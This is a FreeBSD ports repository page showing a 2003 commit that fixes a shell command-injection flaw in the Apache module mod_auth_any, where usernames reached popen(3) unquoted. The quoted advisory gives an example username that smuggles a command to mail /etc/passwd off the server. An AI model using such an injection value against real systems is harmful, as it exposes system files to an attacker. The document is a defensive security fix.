1
0
mirror of https://git.FreeBSD.org/ports.git synced 2024-11-27 00:57:50 +00:00
freebsd-ports/www/mod_auth_any
Mario Sergio Fujikawa Ferreira 0025bdf0b2 o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:	Security Officer (nectar),
		Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:	mod_auth_any CVS [2],
		nalin@redhat.com [3]
2003-03-25 04:23:11 +00:00
..
files o Fix vulnerability that allows execution of arbitrary commands on 2003-03-25 04:23:11 +00:00
distinfo
Makefile o Fix vulnerability that allows execution of arbitrary commands on 2003-03-25 04:23:11 +00:00
pkg-descr
pkg-plist